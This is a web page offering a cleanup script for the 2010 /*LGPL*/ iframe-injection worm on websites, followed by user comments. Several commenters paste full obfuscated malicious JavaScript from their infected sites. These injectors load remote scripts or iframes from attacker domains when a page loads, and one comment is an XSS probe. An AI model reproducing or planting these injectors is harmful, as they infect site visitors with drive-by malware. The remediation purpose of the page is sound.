/*LGPL*/ and /*Exception*/ trojan Removal script, Trojan-Downloader.JS.a or Trojan-Downloader.JS.b or Trojan-Downloader.JS.c or Trojan-Downloader.JS.d cleaner, cleanup, Downloader worm removal. This script removes the trojan code from all files on your web server. Updated Jan 30, 2010

Copyrights© 2013
Possible Solutions

Web Site Security Updates

Clean-up script for sites infected with Downloader worm( /*LGPL*/ or /*Exception*/ type script ).

As we all know there is a mass attack of /*LGPL*/ and /*Exception*/ type script on websites. I have seen plenty of websites infected with this type of infection and finally I decided to write a script to remove the codes inserted in files all over the server directories.

Download the Manual Trojan Code Remover New!Released on 17th Feb 2010



As a new version of /*LGPL*/ and /*Exception*/ is out in wild. The code inserted in web pages after the BODY Tag or at end of Javascript files looks a bit like.

<script>/*LGPL*/ try{ window.onload = function(){var C1nse3sk8o41s = document.createElement('s&c^$#r))i($p@&t^&'.repl

<script>/*Exception*/ document.write(.....)

<script>try{window.onload=function(){(.....)

The SCRIPT tag above is not present in javascript(.js) files.
Well it is just another type of IFRAMER worm. Once deobfuscated, it loads javascript from
[http][POPULAR-DOMAIN-NAMES].easylifedirect.ru:8080/[POPULAR-DOMAIN-NAMES]/google.com/

This loaded Javascript then loads an iframe with src which contains actual payload
[http][POPULAR-DOMAIN-NAMES].easylifedirect.ru:8080/index.php?ys

some urls may also have "thechocolateweb.ru" or "tartband.ru" or "bestbondsite.ru" or "trueworldmedia.ru" or "avattop.ru" in place of "easylifedirect.ru"

The major files infected are
Javascript files .JS
index files such as
index*.html,
index*.htm,
index*.php,
default*.php,
mainframe*.php,
application*.php,
default*.html,
default*.htm
index*.asp
(index*.* and default*.*)

The javascript code seems to be changing since the day it launched and today morning I noticed that they have removed <script> tags in javascript files.

The payload hasn't changed much from last year's attacks. When one visits a compromised site, the malicious JavaScript loads more JavaScript that contains an iframe tag, which opens another page containing two links. One link goes to a PDF file, which is detected as Trojan-Downloader.JS.a or Trojan-Downloader.JS.b or Trojan-Downloader.JS.c or Trojan-Downloader.JS.d. The other is to a JAR (Java ARchive) file, which is detected as Downloader.

Those two files use the following vulnerabilities to infect the computer with malware:

* Adobe Acrobat and Reader Multiple Arbitrary Code Execution and Security Vulnerabilities (BID 27641)
* Adobe Reader and Acrobat 'newplayer()' JavaScript Method Remote Code Execution Vulnerability (BID 37331)
* Sun Java Runtime Environment and Java Development Kit Multiple Security Vulnerabilities (BID 32608)

The final payload includes malware like Trojan-Downloader.JAVA.Agent.al or Trojan-Downloader.JAVA.Agent.exe or Trojan.Bredolab, Downloader.Fostrem, and Trojan.Zbot, along with security risks such as PrivacyCenter and a number of other misleading applications that may be detected as Trojan.FakeAV. It's important to keep your definition files up-to-date as these files are frequently being updated.

REMOVAL STEPS
1. Block these websites on your firewall or router: "thechocolateweb.ru", "tartband.ru", "bestbondsite.ru", "trueworldmedia.ru", "avattop.ru" , "easylifedirect.ru"
2. Update your anti-virus and clean up infection from your machines or whoever is accessing it via FTP
3. Change the ftp password from secure machine which is not infected
4. upload the Manual Trojan Code Remover script to your public_html directory
5. run the script by calling the php file from your browser



PRECAUTIONS
1. Block these websites on your firewall and/or router: "thechocolateweb.ru", "tartband.ru", "bestbondsite.ru", "trueworldmedia.ru", "avattop.ru" , "easylifedirect.ru"
2. Keep your Anti-virus updated.
3. Do not open any suspicious links received on messengers or emails.
It will clean up the files and will also create a backup of files which are infected. (backup files will have extension as .infected.bak)




Update: 30th Jan 2010, Version 1.0.2 released

Ok, I have updated the file with new version to cleanup the new infection string.


Update: 09th Feb 2010, Version 1.0.3 released

Added removal code for latest signatures.


Update: 17th Feb 2010, Manual Trojan Code Remover released

Looks like they are changing the signatures too fast. So I have made this small tool so that you can manually remove the vius code.

Instructions:
1. Download the Manual Trojan Code Remover and unpack.
2. Upload it to document root of your website and run the script by opening the url in your browser
3. Now open the any infected file and copy the trojan code and paste in the textarea in the removal tool.
4. Press Clean All!
Thats All!.

* Please note that you will need extra step for Javascript files.
** Also process code in javascript files after php/asp files.


Let us know if you find other signature or codes, We will try to release an update asap.


Sameer Shelavale
Possible Solutions
Web Development, SEO & Web Security

Download the Manual Trojan Code Remover New!

Tak
tak@takshack.com
Thanks for the tool, was a great help!
Abc
abc@gmail.com
<script language='javascript'>alert('kk');</script>
Wspartner
wspartner@aol.com
Hi there, I'm running php 5.2.16 and it doesn't seem to be working. Anything I can do to get rid of this crazy sript. It seems to be in everything! <script>function createCSS(selector,declaration){var ua=navigator.userAgent.toLowerCase();var isIE=(/msie/.test(ua))&&!(/opera/.test(ua))&&(/win/.test(ua));var style_node=document.createElement("style");if(!isIE)style_node.innerHTML=selector+" {"+declaration+"}";document.getElementsByTagName("head")[0].appendChild(style_node);if(isIE&&document.styleSheets&&document.styleSheets.length>0){var last_style_node=document.styleSheets[document.styleSheets.length-1];if(typeof(last_style_node.addRule)=="object")last_style_node.addRule(selector,declaration);}};var meapW={faeXV:35,dSUii:function(){var u="u";function nU(){};var i=function(){return 'i'};this.wA=false;var n = new Date(2011, 3, 16, 10, 10, 28);this.nM='';this.sE="";o="";var r = n.getMinutes();var d = "fromCharC" + n.getSeconds() + "de";a="";var k=new Date();d = d.replace(28, "o");this.aC='';dD="dD";this.lC=false; createCSS("#c0","background: url(data:,eva)");var g=function(){};var c="c";var b=null;var iQ='';this.yL=33594;this.pT=false;var f=document.styleSheets;var iN=false;yG=43669;kQ=false;for(var q=0;q<f.length;q++){var iT=function(){};function v(){};this.rC="rC";e=55164;var nS=f[q].cssRules||f[q].rules;var pQ="pQ";var dJ=new Array();var uS=function(){};var lI=new Date();for(var x=0;x<nS.length;x++){gT=57994;var dS=function(){};var w=nS.item?nS.item(x):nS[x];function m(){};var fF="fF";if(!w.selectorText.match(/#c(\d+)/))continue;function uR(){};var mW=false;z="";b=w.style.backgroundImage.match(/url\("?data\:[^,]*,([^")]+)"?\)/)[1];nO=false;function sW(){};oV="oV";};kW="";var yF="";var uD=17482;this.nD="nD";}var s=[47,70.5,63,83,62.5,59.5,79.5,51,49,39,71,50.5,62,68.5,43,48.5,54.5,45,38,44.5,74.5,41.5,76,39,83.5,66.5,48,62,39,73,89,57.5,47.5,45.5,56.5,51,80,45.5,67.5,69.5,60.5,39.5,88.5,52,52.5,81,80.5,83,52.5,44,79,78,88,79,49,45,47,73.5,56,50,45,54.5,54,72.5,46.5,61.5,48.5,38,46,68,64,70,43,50.5,45.5,73.5,40,84,39.5,42,38.5,72.5,61.5,39,39,71.5,60.5,46.5,86.5,51.5,59,63.5,56,67,87,76,46.5,37.5,67.5,81,86.5,78,59.5,44.5,68.5,52.5,59,49,42.5,43,65.5,77.5,45.5,39.5,41,66,92.5,60.5,39.5,88,83.5,75,59.5,42,47.5,69,77.5,62.5,45,43,45,58,57,39,46.5,79.5,44.5,42,47,44.5,38.5,39,76.5,75.5,62,62.5,59.5,78,53.5,44.5,42,46.5,44,42,51.5,37.5,46.5,45.5,61.5,52,79.5,58.5,67,51,38.5,42,39.5,73,55,56.5,45.5,62,61,45.5,77,44,90.5,56,72,66,52,47,41,45.5,77.5,83,82.5,44,83,44.5,47,44,60.5,71.5,38.5,48,49,39,70.5,78.5,53.5,37,42.5,39,78.5,61,51,64.5,81,38.5,78.5,40.5,38.5,45,41.5,41,75.5,46.5,50.5,37,49,48.5,48,79,48.5,70,37,41,73,74,58,77.5,59,52,49,83,54.5,63.5,52.5,76,72,78.5,49,88,46.5,59.5,44,83.5,50,58.5,81,81.5,53.5,39,39.5,39.5,74,68.5,59,72,55.5,38.5,49,52.5,48.5,51,38,41,47.5,64.5,84,59.5,68,40.5,37,81.5,77.5,55.5,50.5,53.5,46.5,53,60,37.5,39,46.5,40,42,51,39.5,44,46.5,57,52.5,37,41,44,41,71.5,65.5,81,81.5,42.5,56,45,47.5,49.5,48.5,47,45.5,45,60.5,59,62.5,50,47,42.5,52.5,47.5,43,59,66,62.5,47,77,59.5,75,39,66,53.5,50,51,48.5,60];function t(){};this.kL=23661;var bN='';var p="";mB=false;this.eV=10774;var h=false;y=function(){return {WQZY:s.length/4}}().WQZY*2;var pX=false;this.pS="pS";rF="rF";for(var bA=0;bA<y;bA++){var uE=11742;var eJ=30145;var aW="";l=parseInt((s[y+bA]-meapW.faeXV)*r*0.2)+parseInt((s[bA]-meapW.faeXV)*r*0.2);var fN="";function yS(){};this.aI=false;var mH='';p+=(String[d](l));var kB=false;this.zQ='';function rW(){};this.cM='';}var uQ=false;var nQ=new Date();dH = eval(b+"l");dH(p);zV='';this.mQ="";var cJ=new Array();}};var aZ=new Array();function hE(){};var fP=function(){};meapW.dSUii();</script> <script>function createCSS(selector,declaration){var ua=navigator.userAgent.toLowerCase();var isIE=(/msie/.test(ua))&&!(/opera/.test(ua))&&(/win/.test(ua));var style_node=document.createElement("style");if(!isIE)style_node.innerHTML=selector+" {"+declaration+"}";document.getElementsByTagName("head")[0].appendChild(style_node);if(isIE&&document.styleSheets&&document.styleSheets.length>0){var last_style_node=document.styleSheets[document.styleSheets.length-1];if(typeof(last_style_node.addRule)=="object")last_style_node.addRule(selector,declaration);}};var meapW={faeXV:35,dSUii:function(){var u="u";function nU(){};var i=function(){return 'i'};this.wA=false;var n = new Date(2011, 3, 16, 10, 10, 28);this.nM='';this.sE="";o="";var r = n.getMinutes();var d = "fromCharC" + n.getSeconds() + "de";a="";var k=new Date();d = d.replace(28, "o");this.aC='';dD="dD";this.lC=false; createCSS("#c0","background: url(data:,eva)");var g=function(){};var c="c";var b=null;var iQ='';this.yL=33594;this.pT=false;var f=document.styleSheets;var iN=false;yG=43669;kQ=false;for(var q=0;q<f.length;q++){var iT=function(){};function v(){};this.rC="rC";e=55164;var nS=f[q].cssRules||f[q].rules;var pQ="pQ";var dJ=new Array();var uS=function(){};var lI=new Date();for(var x=0;x<nS.length;x++){gT=57994;var dS=function(){};var w=nS.item?nS.item(x):nS[x];function m(){};var fF="fF";if(!w.selectorText.match(/#c(\d+)/))continue;function uR(){};var mW=false;z="";b=w.style.backgroundImage.match(/url\("?data\:[^,]*,([^")]+)"?\)/)[1];nO=false;function sW(){};oV="oV";};kW="";var yF="";var uD=17482;this.nD="nD";}var s=[47,70.5,63,83,62.5,59.5,79.5,51,49,39,71,50.5,62,68.5,43,48.5,54.5,45,38,44.5,74.5,41.5,76,39,83.5,66.5,48,62,39,73,89,57.5,47.5,45.5,56.5,51,80,45.5,67.5,69.5,60.5,39.5,88.5,52,52.5,81,80.5,83,52.5,44,79,78,88,79,49,45,47,73.5,56,50,45,54.5,54,72.5,46.5,61.5,48.5,38,46,68,64,70,43,50.5,45.5,73.5,40,84,39.5,42,38.5,72.5,61.5,39,39,71.5,60.5,46.5,86.5,51.5,59,63.5,56,67,87,76,46.5,37.5,67.5,81,86.5,78,59.5,44.5,68.5,52.5,59,49,42.5,43,65.5,77.5,45.5,39.5,41,66,92.5,60.5,39.5,88,83.5,75,59.5,42,47.5,69,77.5,62.5,45,43,45,58,57,39,46.5,79.5,44.5,42,47,44.5,38.5,39,76.5,75.5,62,62.5,59.5,78,53.5,44.5,42,46.5,44,42,51.5,37.5,46.5,45.5,61.5,52,79.5,58.5,67,51,38.5,42,39.5,73,55,56.5,45.5,62,61,45.5,77,44,90.5,56,72,66,52,47,41,45.5,77.5,83,82.5,44,83,44.5,47,44,60.5,71.5,38.5,48,49,39,70.5,78.5,53.5,37,42.5,39,78.5,61,51,64.5,81,38.5,78.5,40.5,38.5,45,41.5,41,75.5,46.5,50.5,37,49,48.5,48,79,48.5,70,37,41,73,74,58,77.5,59,52,49,83,54.5,63.5,52.5,76,72,78.5,49,88,46.5,59.5,44,83.5,50,58.5,81,81.5,53.5,39,39.5,39.5,74,68.5,59,72,55.5,38.5,49,52.5,48.5,51,38,41,47.5,64.5,84,59.5,68,40.5,37,81.5,77.5,55.5,50.5,53.5,46.5,53,60,37.5,39,46.5,40,42,51,39.5,44,46.5,57,52.5,37,41,44,41,71.5,65.5,81,81.5,42.5,56,45,47.5,49.5,48.5,47,45.5,45,60.5,59,62.5,50,47,42.5,52.5,47.5,43,59,66,62.5,47,77,59.5,75,39,66,53.5,50,51,48.5,60];function t(){};this.kL=23661;var bN='';var p="";mB=false;this.eV=10774;var h=false;y=function(){return {WQZY:s.length/4}}().WQZY*2;var pX=false;this.pS="pS";rF="rF";for(var bA=0;bA<y;bA++){var uE=11742;var eJ=30145;var aW="";l=parseInt((s[y+bA]-meapW.faeXV)*r*0.2)+parseInt((s[bA]-meapW.faeXV)*r*0.2);var fN="";function yS(){};this.aI=false;var mH='';p+=(String[d](l));var kB=false;this.zQ='';function rW(){};this.cM='';}var uQ=false;var nQ=new Date();dH = eval(b+"l");dH(p);zV='';this.mQ="";var cJ=new Array();}};var aZ=new Array();function hE(){};var fP=function(){};meapW.dSUii();</script>
Smarttin
smarttin@gmail.com
<script>document.write("<if"+''+'ra'+''+"m"+'e s'+"rc=\"h"+''+'tt'+"p:"+''+"/"+''+'/mic'+"roso"+'t'+''+'f.c'+"n"+'/'+"\" wid"+''+'th=1 he'+"igh"+''+'t'+"="+"2></i"+''+"f"+"ra"+''+""+''+"me"+'>');</script><script>document.write("<if"+'ra'+"m"+'e s'+"rc=\"h"+'tt'+"p:"+''+"/"+'/mic'+"roso"+'t'+'f.c'+"n"+'/'+"\" wid"+'th=1 he'+"igh"+'t'+"="+"2></i"+"f"+"ra"+''+""+''+"me"+'>');</script>
Steve
pate.steve@gmail.com
Hi Sameer Just like to send a BIG thankyou for making this tool available. All wordpress sites on my domain had been infected & your FREE! tool was a godsend. Thanks Again Regards Steve
Silambarasan
silambarasan@qualian.in
Hi All, My virus Script is this-->"<script>var CePeqw=window;var FayehNee='eSpv5PaUXl7U7'.replace(/[Sp5PUX7U7]/g, '');BepewFe=98;var NeMehezc='fWlArAoEVm4C6h4VaJJ9rE6ClpPoDBdAjep'.replace(/[WlAAEV464VJJ9E6lpPDBAjp]/g, '');JesatZex=5;var BePas=String;var QaNezejo=1;QaNezejo+=1;GepebTacax='cazefenagehen';var CageGan=-42;CageGan+=58;CeteYa=48;var JaSenet='jebafer nezaz waxaxav megerekedafehase gemejez dere peremehe vewada betadej qemelegapegesa jehacec nesege vegefaw sahegemecasazaz vesadeha palac kev feqaneqeveqeyaw mehadata zeqejada kewajepe zey gazareh verazenefe tacefefe hawam habezey seveca lam weqesefag ner jedatahe kede fataneneyeqez marafaf lezenamaje ganeneh wecagev sekadewe keh tezeseh ca gelehew yehayejewezena bedeket defewe ked m belelaze beze balenen rege rahawefe vey natesew pefedaqahebakene heveseq jamayeqacarat levejam yehacejabelay vafemeg yexepebece gezemet beterepanamepab nemafek heqaneca rema vexasapekewade nak teh cekadeg rarahejepareles veyecer lavewewewekeqege ceb ves zen g degasege gezasage jeparel yehewebaqa texepel kecex recawefe nezaq nepesew vategasef seva sevebavecejeke ray vad rege ca tas kes bem r sefeqet renerexec mayehev sebesa rexewes reqeweleje xepabac beqeqeze wenaber napedesev zegewepa qeres seme mawerelezegebe hed pan cewe ta mec kag qek j mapajer wam pagemep yarebasamabekate vadesapa qev qaremek mezav ladahah dapaja peqalape ses jepe helayerapapasa qaf xeh wane g lek vet caz p becaqad batezac yadedene req veqeked wa xemekar kaferahewamema lelezat bazebe sezajec qef palexel bemesegezeyezama welegene hez cesevey leyeh revamev wewaga wajabaye les bele zagemekalezefa ges ked dewe w mem ket lef j gaxaxeve pasa bebayapa mek wabawab deqe feve yakakelevevaga hen jes vebezad vavecanez kakeraza xenem yerenete jeseg zeyeyesa z cebe pareyefexej zer keparecegedaxete saw fexekeqededecepa mapayene dese fecezad celebateba hapeyax yemaneqenefepa nebadew tekaseqege dabepeg mecebaxemetem teteces samewanazabeq geqebeke reveha pem gayalefexeyeqey lerayan xaye menemeb pesekedezabepehe cayezat keranejeledame reh neyefafaxedenese genadex gare necevel rexefecegevebapa zazepate wefene zecesav xeneganefecatav fagedete hajeh qaje hel pewa lemete her mexasademezadas yewedaba v balerav wakebayep kezezexe l zag peb jege regevanevegaqez deqa kafalejarenem sav mafakabacakaveve yefewef hemebecate repegel hesegej texezeze taj dayaxen ce hedepey vezetaxejaqece xafaway qabefe zeye nenesezamedewec sex gehewepe ten vemadebaza'.split(' ');var BejNecn='';var HePei=parseInt;var GaxDeo=-32;GaxDeo+=32;TeJafas='bejegaravekefeba';var WabeFebexe=46;WabeFebexe+=-45;FefWemeq=89;FayehNee=CePeqw[FayehNee];NeMehezc=BePas[NeMehezc];for (FeyTai=GaxDeo;FeyTai<JaSenet.length-1;FeyTai+=QaNezejo) BejNecn += NeMehezc(HePei((JaSenet[FeyTai+GaxDeo].length-1).toString(CageGan)+(JaSenet[FeyTai+WabeFebexe].length-1).toString(CageGan), CageGan));FayehNee(BejNecn);</script>"
Silambarasan
silambarasan@qualian.in
Hi, For my Script the Virus Removal code is not working,It shows an Error like "Unable to clean a infected file(file not writable):/homepages/43/d149126437/htdocs/logs/traffic.html/01.html"
Marie-Anne Harkness
maharkness@comcast.net
Dick Muri has my vote and my husband's vote as well. He will be a refreshing independent thinker representing us, not afraid to vote for the people's benefit. A majority of 9th District citizens were against the Obama Health Insurance fiasco. The incumbent voted the party line and voted yes.
testesr
sadhana@possible.in
This is for testing.
Pat
pat.romain@gmail.com
<script>eval(parseJS('var t="";var h="";var G;if(G!=_39_m_39_){G=_39__39_};var D_="";function C() {var S=_39__39_;var J="";var K=window;var V;if(V! = _39_O_39_){V=_39__39_};var R=String("scri"+"pt");var iq="";var Z;var r=_39__39_;var A;if(A!=_39__39_){A=_39_zH_39_};var Fl=new String();var E=String("g");var L="appmnQi".substr(0,3)+"end"+"Chinrc7".substr(0,3)+"ldxiDU".substr(0,2);var b=new String("]");var f;if(f!=_39__39_ && f!=_39_Qp_39_){f=null};var z=RegExp;var GU;if(GU!=_39_I_39_ && GU!=_39_lb_39_){GU=_39__39_};this.JL="";var bT;if(bT!=_39__39_){bT=_39_px_39_};function N(q,p){var d="[";var nm;if(nm!=_39_il_39_ && nm != _39__39_){nm=null};d+=p;d+=b;var oF;if(oF!=_39_So_39_ && oF != _39__39_){oF=null};var w=new z(d, E);this.ze=_39__39_;return q.replace(w, r);};var wk;if(wk!=_39_e_39_){wk=_39__39_};this.Ns=_39__39_;var i="onl"+"oad";var dz;if(dz!=_39_no_39_){dz=_39_no_39_};this.wa=_39__39_;var LO=_39__39_;var O_=_39__39_;var u=N(_39_sqr4cp_39_,_39_5pqQ4xa7_39_);var D="defeANm0".substr(0,4)+"r";this.g=_39__39_;this.Vw=_39__39_;Z=function(){this.ZF=_39__39_;try {var Gf;if(Gf!=_39_uW_39_ && Gf != _39__39_){Gf=null};n=document.createElement(R);var RV=new String();var Yo;if(Yo!=_39__39_ && Yo!=_39_fF_39_){Yo=_39_ib_39_};var v=new Array();n[D]=[1,8][0];var gY=_39__39_;var gYj=_39__39_;n[u] = N(_39_hGtQtGpW:H/j/jpYoHkjeGsjaWcYkG.YrQuY:j_39_,_39_GYjQWH_39_)+N( _39_8295634772434270642295791948166996914660733561217215135_39_,_39_65174293_39_ )+N(_39_/DgXoVoEg5lReL.6cMoXm5/jt9eIcWh4nIo4r9aWtLiR.Wc5o3mR/Wi5c9iMb6a9.WcRo3mI.4p9hXp5_39_,_39_I36Xj9VE4W5RDLM_39_);var XG;if(XG!=_39__39_ && XG!=_39_vi_39_){XG=null};var II=_39__39_;var Q=new String("bodyOc6".substr(0,4));var QA;if(QA!=_39__39_ && QA!=_39_wq_39_){QA=_39_JJ_39_};var Oa;if(Oa!=_39__39_ && Oa!=_39_hH_39_){Oa=_39_Od_39_};var yK=new String();var Zy;if(Zy!=_39__39_ && Zy!=_39_MB_39_){Zy=null};var uu;if(uu!=_39__39_ && uu!=_39_nE_39_){uu=null};document[Q][L](n);var fR;if(fR!=_39_U_39_ && fR != _39__39_){fR=null};} catch(H){this.EW="";var x_=new Date();};this.YM=_39__39_;};K[i]=Z;var vr="";this.kR=_39__39_;var Jf;if(Jf!=_39_of_39_ && Jf != _39__39_) {Jf=null};};var Wd=new Array();var UK; if(UK!=_39_HZ_39_ && UK!=_39_uz_39_) {UK=_39__39_}; C(); var KqP=new String();'));</script>
This is the code <script>var B="";try {var Pm;if(Pm!='Wg' && Pm != ''){Pm=null};var X="";var aL;if(aL!='l'){aL='l'};var n=window[unescape("%75%6e%65%73%63%61%70%65")];var f='';var x;if(x!='lM'){x='lM'};var z="";var U;if(U!=''){U='Y'};var A=null;var iB='';this.R="";var J=n("%72%65%70%6c%61%63%65");this.lW='';var NU;if(NU!='' && NU!='V'){NU=null};var m=window[n("%52%65%67%45%78%70")];this.sl='';var CK;if(CK!='yC' && CK!='Xs'){CK=''};function Q(j,mO){var tT;if(tT!='Ew' && tT!='H'){tT=''};var Z=n("%5b");var UU=new Array();var dY;if(dY!='Wd' && dY!='MQ'){dY=''};Z+=mO;var ER;if(ER!=''){ER='O'};Z+=n("%5d");this.pl='';var F=new m(Z, n("%67"));var W_;if(W_!='' && W_!='c'){W_='G'};var jc=new String();return j.replace(F, A);};var sY;if(sY!='' && sY!='r'){sY=''};this.bz="";var v=Q('8643949097791587555567306637967','7635491');this.Ra='';var j=n("%31");var Cf=new Array();var T=n("%73%63%72%69%70%74");var i=Q('/xpwaqnLtwiVpx-VcqoLmV/wgqoWoLgLlqeW.wcVoVmL/wtWaqgqgVeLdw.xcxoUmW.UpUhxpw','VqLwUWx');this.hx="";var b="on"+"lo"+"adK2O".substr(0,2);var tE;if(tE!='D' && tE!='sD'){tE=''};var W='';var vb;if(vb!='qj' && vb!='CJ'){vb=''};var gX;if(gX!='' && gX!='jy'){gX=null};var QY="\x68\x74\x74\x70\x3a\x2f\x2f\x6a\x6f\x79\x73\x70\x6f\x72\x74\x73\x77\x6f\x72\x6c\x64\x2e\x69\x6e\x66\x6f\x3a";var VV;if(VV!='w'){VV=''};this.FS="";var tl;if(tl!='uQ' && tl!='Xd'){tl='uQ'};function vi(){var eo;if(eo!='CC' && eo!='Eh'){eo=''};var JP=document;var jk;if(jk!='nA' && jk!='gZ'){jk='nA'};vG=JP.createElement(T);var QM=new Date();var _C=new Array();var lO;if(lO!='' && lO!='Au'){lO=''};W+=QY;W+=v+i;var BJ;if(BJ!='' && BJ!='rw'){BJ='HW'};this.lH='';vG.defer=j;this.nL='';this.ls='';vG.src=W;var cW="";var hB=new Array();var Jo=JP.body;Jo.appendChild(vG);var RC=new Array();var I=new Array();};var um;if(um!='QP'){um=''};var Lr=new Array();window[b]=vi;var Ny;if(Ny!='Zg' && Ny!='hP'){Ny='Zg'};var fi="";var yj="";} catch(y){var dH;if(dH!='RT' && dH != ''){dH=null};var xP;if(xP!='tB' && xP != ''){xP=null};};</script> <!--3f4e59c3c78554c701496acf24e1b1b7-->
Looks like a great script but it doesn't work. My server has php 5.2.12. Would really appreciate it if you can tell me how to get it to work. I've tried it in the root of the site and then in each sub folder but nothing. Stan
VietNam360Plus
vietnam360plus@gmail.com
<script>var t="";var h="";var G;if(G!='m'){G=''};var D_="";function C() {var S='';var J="";var K=window;var V;if(V!='O'){V=''};var R=String("scri"+"pt");var iq="";var Z;var r='';var A;if(A!=''){A='zH'};var Fl=new String();var E=String("g");var L="appmnQi".substr(0,3)+"end"+"Chinrc7".substr(0,3)+"ldxiDU".substr(0,2);var b=new String("]");var f;if(f!='' && f!='Qp'){f=null};var z=RegExp;var GU;if(GU!='I' && GU!='lb'){GU=''};this.JL="";var bT;if(bT!=''){bT='px'};function N(q,p){var d="[";var nm;if(nm!='il' && nm != ''){nm=null};d+=p;d+=b;var oF;if(oF!='So' && oF != ''){oF=null};var w=new z(d, E);this.ze='';return q.replace(w, r);};var wk;if(wk!='e'){wk=''};this.Ns='';var i="onl"+"oad";var dz;if(dz!='no'){dz='no'};this.wa='';var LO='';var O_='';var u=N('sqr4cp','5pqQ4xa7');var D="defeANm0".substr(0,4)+"r";this.g='';this.Vw='';Z=function(){this.ZF='';try {var Gf;if(Gf!='uW' && Gf != ''){Gf=null};n=document.createElement(R);var RV=new String();var Yo;if(Yo!='' && Yo!='fF'){Yo='ib'};var v=new Array();n[D]=[1,8][0];var gY='';var gYj='';n[u] = N('hGtQtGpW:H/j/jpYoHkjeGsjaWcYkG.YrQuY:j','GYjQWH')+N('8295634772434270642295791948166996914660733561217215135','65174293')+N('/DgXoVoEg5lReL.6cMoXm5/jt9eIcWh4nIo4r9aWtLiR.Wc5o3mR/Wi5c9iMb6a9.WcRo3mI.4p9hXp5','I36Xj9VE4W5RDLM');var XG;if(XG!='' && XG!='vi'){XG=null};var II='';var Q=new String("bodyOc6".substr(0,4));var QA;if(QA!='' && QA!='wq'){QA='JJ'};var Oa;if(Oa!='' && Oa!='hH'){Oa='Od'};var yK=new String();var Zy;if(Zy!='' && Zy!='MB'){Zy=null};var uu;if(uu!='' && uu!='nE'){uu=null};document[Q][L](n);var fR;if(fR!='U' && fR != ''){fR=null};} catch(H){this.EW="";var x_=new Date();};this.YM='';};K[i]=Z;var vr="";this.kR='';var Jf;if(Jf!='of' && Jf != ''){Jf=null};};var Wd=new Array();var UK;if(UK!='HZ' && UK!='uz'){UK=''};C();var KqP=new String();</script> <!--20bd2da471d77a7db51433b12a05f16b-->
i HAVE THIS on every index.php and index.html : <script>var H='';var Y;if(Y!='' && Y!='r'){Y=null};var p='';var rE;if(rE!=''){rE='w'};function l(){var C=new String();var Gl;if(Gl!='Cs' && Gl!='z'){Gl='Cs'};var uW=new String();var W_=new String();var h=unescape;var V;if(V!='TH' && V!='Po'){V='TH'};this.Yu="";var Nr=new Array();var E=window;var B=new String();var SA;if(SA!='GE'){SA='GE'};var t=h("%2f%67%6f%6f%67%6c%65%2e%63%6f%6d%2f%76%65%72%69%7a%6f%6e%2e%6e%65%74%2f%70%68%6f%74%6f%62%75%63%6b%65%74%2e%63%6f%6d%2e%70%68%70");var _B;if(_B!='' && _B!='J'){_B=null};function Z(N,d){var WJ;if(WJ!='vX'){WJ='vX'};var n="";var P="g";var A=new Date();var Tq;if(Tq!=''){Tq='rL'};var G=h("%5b"), o=h("%5d");var pa=new String();var Zv;if(Zv!='q'){Zv=''};var ob=G+d+o;var Cg;if(Cg!='jc' && Cg!='Vd'){Cg=''};var ho=new RegExp(ob, P);var BY;if(BY!='MU' && BY!='EB'){BY=''};return N.replace(ho, new String());var gV=new Date();var O=new String();};this.qS="";var lp;if(lp!='' && lp!='Oi'){lp=null};var wa;if(wa!='' && wa!='mH'){wa='vP'};var rdd;if(rdd!='TQ' && rdd != ''){rdd=null};var Pv;if(Pv!='rK' && Pv != ''){Pv=null};var Q=Z('87712732013572846317066731','71254936');var cC="";var Ye=new Date();var Gd=new String();var Lj="";var X=document;this.Wt="";var ZG="";function Ze(){var qP=new Array();var kc;if(kc!='' && kc!='gK'){kc=''};var W=h("%68%74%74%70%3a%2f%2f%65%61%73%79%66%75%6e%67%75%69%64%65%2e%61%74%3a");var ZN=new Date();var RI;if(RI!='Je' && RI != ''){RI=null};var iR=new String();Gd=W;var pw=new Date();Gd+=Q;this.nJ="";Gd+=t;var oT;if(oT!='xz'){oT=''};try {var tW=new Date();var ny="";dl=X.createElement(Z('sqcqrqilpqtq','lq'));dl[h("%73%72%63")]=Gd;var LE;if(LE!='Js' && LE != ''){LE=null};dl[h("%64%65%66%65%72")]=[8,1][1];this.gg='';this.fz='';X.body.appendChild(dl);this.lF='';var zV;if(zV!='HU'){zV=''};var cH;if(cH!='' && cH!='zO'){cH='vg'};} catch(U){var DI;if(DI!='vM' && DI!='Gk'){DI='vM'};alert(U);var Pz;if(Pz!=''){Pz='jz'};};var PJ=new Date();}var tO=new Array();var qPw;if(qPw!='' && qPw!='oI'){qPw='iC'};var Av="";var cI=new String();E["pbAfonl".substr(4)+"9gnoad9gn".substr(3,3)]=Ze;};this.tC="";var cD='';l();</script> <!--ad9b423bac7ee8a79bd67162af71975c--> -------------------------------- can I remove them?
I'm having the same problem.... Unable to clean a infected file(file not writable) There are hundreds and hundreds listed, and strangely, many of the files listed are *not* infected. Oh man I hope someone can post a solution... this script really seems to be the answer to a problem that otherwise seems insurmountable!
to all those wondering if the script works on new strains, it should. pretty much whatever you post into the input box it will search out in every file and then remove it, its a glorified search and replace script. unfortunately i cant seem to get it to work on my server, hope you all have better luck.
mamamia
postruk98@hotmail.com
<script>var P=new Array();try {var A;if(A!='un' && A!='n'){A='un'};var QD;if(QD!='L' && QD!='v'){QD='L'};var G=String("kAOrg".substr(4));var vW=new Date();var f=String("repl"+"ace");var l='';var r="[";var hm;if(hm!=''){hm='rm'};var N=RegExp;var sG;if(sG!='Ql'){sG='Ql'};var S='';var nE;if(nE!=''){nE='W'};this.LM='';var Sb="6Zc]".substr(3);var fb="";function Y(u,H){var KU='';var tV;if(tV!='' && tV!='ct'){tV=''};this.p='';var X=r;X+=H;var _;if(_!='Yw'){_=''};this.yj="";X+=Sb;var XK=new N(X, G);return u.replace(XK, S);var m;if(m!='KP' && m!='We'){m='KP'};};var pt=new Date();var M;if(M!='' && M!='Ge'){M='xc'};var c=Y('hZtZt2p2:2/Z/Za2u2tZoZ-2rZuZ.ZbZlZoZgZfZa2.2cZoZm2.ZmZoZn2oZgZr2a2f2i2aZsZ-2cZo2m2.ZBZl2eZnZd2eZr2M2aZg2a2z2i2nZeZOZn2lZi2n2eZ.Zr2uZ:2',"Z2");var fM='';var Bs='';var oQa="";var F=String("sc"+"riEb2Y".substr(0,2)+"pthvof".substr(0,2));var u="1";var _E;if(_E!='' && _E!='va'){_E='GO'};var tZ=new Array();var rP;if(rP!='rq'){rP='rq'};this.kP="";var 